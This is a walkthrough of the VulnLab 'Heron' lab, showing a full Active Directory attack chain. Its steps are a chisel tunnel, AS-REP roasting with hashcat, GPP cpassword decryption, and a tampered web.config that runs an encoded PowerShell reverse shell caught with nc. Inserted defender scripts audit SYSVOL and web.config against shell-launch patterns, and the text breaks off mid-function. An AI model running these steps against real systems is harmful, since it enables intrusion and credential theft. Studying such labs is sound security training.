vulnlab-heron
a medium chain
We find a note online with the initial password for the Linux box: pentest:Heron123!
We start a chisel server on our Kali box, then SSH to the jump host and run the chisel client from there to get a reverse SOCKS proxy:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
* Welcome to Heron Corp *
* Unauthorized access to 'frajmp.heron.vl' is *
* forbidden and will be prosecuted by law. *
****************************************************
(pentest@10.10.148.86) Password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)
System information as of Fri Aug 2 12:24:16 PM UTC 2024
System load: 0.0 Processes: 110
Usage of /: 44.8% of 9.75GB Users logged in: 0
Memory usage: 23% IPv4 address for ens5: 10.10.148.86
Swap usage: 0%
Last login: Fri Jun 7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest pts/0 2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23-- http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’
chisel 100%[=======================>] 8.31M 6.88MB/s in 1.2s
2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]
pentest@frajmp:/tmp$ chmod +x chisel
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)
We run a slow nmap scan of the DC through proxychains:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:53 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:3389 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
Nmap scan report for 10.10.148.85
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after: 2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp closed https
445/tcp open microsoft-ds Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: HERON
| NetBIOS_Domain_Name: HERON
| NetBIOS_Computer_Name: MUCDC
| DNS_Domain_Name: heron.vl
| DNS_Computer_Name: mucdc.heron.vl
| DNS_Tree_Name: heron.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after: 2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-08-02T12:49:12
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery:
| OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
| Computer name: mucdc
| NetBIOS computer name: MUCDC\x00
| Domain name: heron.vl
| Forest name: heron.vl
| FQDN: mucdc.heron.vl
|_ System time: 2024-08-02T05:49:10-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
┌──(puck㉿kali)-[~/vulnlab/heron]
On open port 80, a curl of the site gives us some usernames:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK
<!DOCTYPE html>
<html lang="en">
<body>
<div class="container mt-5">
<div class="text-center mb-4">
<h1 class="display-4 text-white">Heron Corp</h1>
<p class="lead text-white">Building the future of aerospace with precision and innovation.</p>
<h5 class="card-title">Wayne Wood</h5>
<p class="card-text">CEO</p>
<p>Email: wayne.wood@heron.vl</p>
<h5 class="card-title">Julian Pratt</h5>
<p class="card-text">Head of IT</p>
<p>Email: julian.pratt@heron.vl</p>
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Samuel Davies</h5>
<p class="card-text">Accounting</p>
<p>Email: samuel.davies@heron.vl</p>
</body>
</html>
┌──(puck㉿kali)-[~/vulnlab/heron]
We add the DC to our /etc/hosts:
10.10.148.85 mucdc.heron.vl heron.vl
…
Next we check for AS-REP roastable users (AD accounts with the option "Do not require Kerberos preauthentication" set):
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
┌──(puck㉿kali)-[~/vulnlab/heron]
We crack this with hashcat; AS-REP roasting hashes use hashcat mode 18200:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug 2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug 2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Started: Fri Aug 2 15:06:29 2024
Stopped: Fri Aug 2 15:06:32 2024
With the recovered password, we run a BloodHound collection:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer:
INFO: Querying computer:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.86:445
INFO: Querying computer:
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 <--socket error or timeout! ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip
Getting the full user list with ldapsearch:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
SMB enumeration:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Password for [WORKGROUP\samuel.davies]:
Sharename Type Comment
--------- ---- -------
accounting$ Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
home$ Disk
IPC$ IPC Remote IPC
it$ Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
transfer$ Disk
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Connecting to the SYSVOL share, we find a Groups.xml with a password in it:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 26 11:37:40 2024
.. D 0 Sun May 26 11:37:40 2024
heron.vl Dr 0 Sun May 26 11:37:40 2024
6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
. D 0 Sun May 26 11:38:59 2024
.. D 0 Sun May 26 11:37:40 2024
DfsrPrivate DHSr 0 Sun May 26 11:38:59 2024
Policies D 0 Tue Jun 4 17:57:41 2024
scripts D 0 Sun Jun 2 12:42:56 2024
6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
. D 0 Tue Jun 4 17:57:41 2024
.. D 0 Sun May 26 11:38:59 2024
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sun May 26 11:37:44 2024
{3FFDA928-A6D1-4860-936F-25D9D2D7EAEF} D 0 Sun May 26 12:21:54 2024
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sun May 26 11:37:44 2024
{6CC75E8D-586E-4B13-BF80-B91BEF1F221C} D 0 Tue Jun 4 17:57:41 2024
{866ECED1-24B0-46EF-92F5-652345A1820C} D 0 Sun May 26 12:23:29 2024
6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
. D 0 Tue Jun 4 17:57:41 2024
.. D 0 Tue Jun 4 17:57:41 2024
GPT.INI A 59 Tue Jun 4 18:00:13 2024
Machine D 0 Tue Jun 4 17:59:44 2024
User D 0 Tue Jun 4 17:57:41 2024
6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:57:41 2024
Preferences D 0 Tue Jun 4 17:59:44 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:59:44 2024
Groups D 0 Tue Jun 4 17:59:44 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
. D 0 Tue Jun 4 17:59:44 2024
.. D 0 Tue Jun 4 17:59:44 2024
Groups.xml A 1135 Tue Jun 4 18:01:07 2024
6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\>
Decrypting the GPP cpassword with gpp-decrypt:
pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==
__ __
___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_
/ _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/
\_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/
/___/ /_/ /_/ /___/ /_/
[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$
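A defender-side check for the same exposure, added here as an example and not part of the writeup or of gpp-decrypt: it walks a SYSVOL Policies tree for Group Policy Preferences XML files that still carry a cpassword attribute and reports which GPO, preference item and account each one belongs to. The Groups.xml content, the account name and the cpassword value are constructed; only the GPO GUID is the one from the listing above.

```python
import base64
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Constructed sample in the SYSVOL layout seen above
# (Policies\{GUID}\Machine\Preferences\Groups\Groups.xml); the account
# name and cpassword value are made up, not the ones from the lab.
GPO_GUID = "{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}"
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc-example"
        image="2" changed="2024-06-04 16:01:07"
        uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="U" newName="" description=""
        cpassword="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="svc-example"/>
  </User>
</Groups>
"""

GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# Attribute naming the account, by preference type (Groups, Services, Tasks, Drives).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


@dataclass
class CpasswordFinding:
    source: str          # file or share path the XML came from
    gpo_guid: str        # policy GUID taken from that path ("" if none)
    item_name: str       # name= of the enclosing preference item
    account: str         # account the stored credential belongs to
    changed: str         # changed= timestamp of the item
    ciphertext_len: int  # decoded cpassword length in bytes


def decode_cpassword(cpassword: str) -> bytes:
    """GPP strips the base64 padding; restore it, then decode."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def find_cpasswords(xml_text: str, source: str) -> List[CpasswordFinding]:
    """Return one finding per element carrying a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    match = GUID_RE.search(source)
    gpo_guid = match.group(0).upper() if match else ""
    findings = []
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword", "")
        if not cpw:
            continue
        item = parents.get(elem, elem)  # <Properties> sits under the item
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                        if elem.attrib.get(a)), "")
        findings.append(CpasswordFinding(
            source, gpo_guid, item.attrib.get("name", ""), account,
            item.attrib.get("changed", ""), len(decode_cpassword(cpw))))
    return findings


def scan_policies(policies_dir: str) -> List[CpasswordFinding]:
    """Walk a SYSVOL Policies tree and audit every Preferences XML file."""
    findings = []
    for dirpath, _dirs, files in os.walk(policies_dir):
        if os.path.basename(os.path.dirname(dirpath)) != "Preferences":
            continue
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8-sig") as fh:
                text = fh.read()
            try:
                findings.extend(find_cpasswords(text, path))
            except ET.ParseError:
                continue  # not a GPP XML file; skip it
    return findings


def demo() -> List[CpasswordFinding]:
    """Write the sample into a temporary SYSVOL-like tree and scan it."""
    base = tempfile.mkdtemp()
    groups_dir = os.path.join(base, "Policies", GPO_GUID,
                              "Machine", "Preferences", "Groups")
    os.makedirs(groups_dir)
    with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return scan_policies(os.path.join(base, "Policies"))
```

Run against a copy of the real SYSVOL Policies folder, every finding is a credential that any domain user can read and should be removed from the GPO.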
With the H3<redacted>#! password, which is valid for the user svc-web-accounting-d, we can access the accounting$ share:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 7 08:14:04 2024
.. DHS 0 Sun Jun 2 17:26:14 2024
AccountingApp.deps.json A 37407 Sun Jun 2 21:25:26 2024
AccountingApp.dll A 89600 Sun Jun 2 21:25:26 2024
AccountingApp.exe A 140800 Sun Jun 2 21:25:26 2024
AccountingApp.pdb A 39488 Sun Jun 2 21:25:26 2024
AccountingApp.runtimeconfig.json A 557 Sun Jun 2 00:22:20 2024
appsettings.Development.json A 127 Sun Jun 2 00:00:54 2024
appsettings.json A 237 Sun Jun 2 00:03:50 2024
FinanceApp.db A 106496 Sat Jun 1 16:09:00 2024
Microsoft.AspNetCore.Authentication.Negotiate.dll A 53920 Wed Nov 1 10:08:26 2023
Microsoft.AspNetCore.Cryptography.Internal.dll A 52912 Mon May 20 14:23:52 2024
Microsoft.AspNetCore.Cryptography.KeyDerivation.dll A 23712 Mon May 20 14:23:56 2024
Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll A 108808 Mon May 20 14:24:24 2024
Microsoft.Data.Sqlite.dll A 172992 Mon May 20 09:54:40 2024
Microsoft.EntityFrameworkCore.Abstractions.dll A 34848 Mon May 20 09:54:30 2024
Microsoft.EntityFrameworkCore.dll A 2533312 Mon May 20 09:55:04 2024
Microsoft.EntityFrameworkCore.Relational.dll A 1991616 Mon May 20 09:55:20 2024
Microsoft.EntityFrameworkCore.Sqlite.dll A 257456 Mon May 20 09:55:30 2024
Microsoft.Extensions.DependencyModel.dll A 79624 Tue Oct 31 23:59:24 2023
Microsoft.Extensions.Identity.Core.dll A 177840 Mon May 20 14:24:10 2024
Microsoft.Extensions.Identity.Stores.dll A 45232 Mon May 20 14:24:20 2024
Microsoft.Extensions.Options.dll A 64776 Thu Jan 18 12:05:26 2024
runtimes D 0 Sat Jun 1 16:51:32 2024
SQLitePCLRaw.batteries_v2.dll A 5120 Thu Aug 24 04:41:24 2023
SQLitePCLRaw.core.dll A 50688 Thu Aug 24 04:38:38 2023
SQLitePCLRaw.provider.e_sqlite3.dll A 35840 Thu Aug 24 04:38:52 2023
System.DirectoryServices.Protocols.dll A 71944 Wed Nov 1 00:00:24 2023
web.config A 554 Thu Jun 6 16:41:39 2024
wwwroot D 0 Sat Jun 1 16:51:32 2024
6261499 blocks of size 4096. 1957663 blocks available
smb: \>
We remove web.config and then upload a modified web.config.
I used this one:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="powershell" arguments="-e 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" hostingModel="OutOfProcess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Then I opened http://accounting.heron.vl in Firefox through proxychains,
logged in as svc-web-accounting-d with the H3<redacted>#! password, and then visited http://accounting.heron.vl/execute.now to trigger it,
or do a curl like this:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... accounting.heron.vl:80 ... OK
and caught the reverse shell back on my Kali box:
┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560
PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir
Directory: C:\windows\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2024 7:12 AM 1416 dns.ps1
-a---- 6/1/2024 8:26 AM 221 ssh.ps1
PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>
I checked with Get-MpComputerStatus that Defender is running on MUCDC; it kills the session after about 1 min, so I visited http://accounting.heron.vl/execute.now again whenever I needed more time.
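An added detection example, not part of the writeup: an audit of an ASP.NET Core web.config that flags the pattern used above, the aspNetCore handler bound to a single path and processPath pointing at a shell with an encoded command. Both configs below are constructed; the tampered one mirrors the file above with the encoded payload replaced by a placeholder, and the expected app name is assumed to be AccountingApp.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed: the web.config an ASP.NET Core app like AccountingApp normally
# ships with (dotnet host, handler on every path).
BENIGN_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\\AccountingApp.dll" stdoutLogEnabled="false" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
"""

# Constructed: the shape of the tampered file above, encoded command replaced.
TAMPERED_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e BASE64_PLACEHOLDER" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
"""

SHELL_PROCESSES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe", "cmd", "cmd.exe"}
EXPECTED_PROCESSES = {"dotnet", "dotnet.exe"}
ENCODED_FLAGS = ("-e ", "-ec ", "-enc", "-encodedcommand")


def audit_web_config(xml_text: str, app_exe: str = "AccountingApp.exe") -> List[str]:
    """Return a list of findings; an empty list means the config looks normal."""
    root = ET.fromstring(xml_text)
    findings = []
    for core in root.iter("aspNetCore"):
        proc = core.attrib.get("processPath", "")
        name = proc.replace("\\", "/").rsplit("/", 1)[-1].lower()
        args = core.attrib.get("arguments", "").lstrip().lower()
        if name in SHELL_PROCESSES:
            findings.append("aspNetCore processPath launches a shell: %r" % proc)
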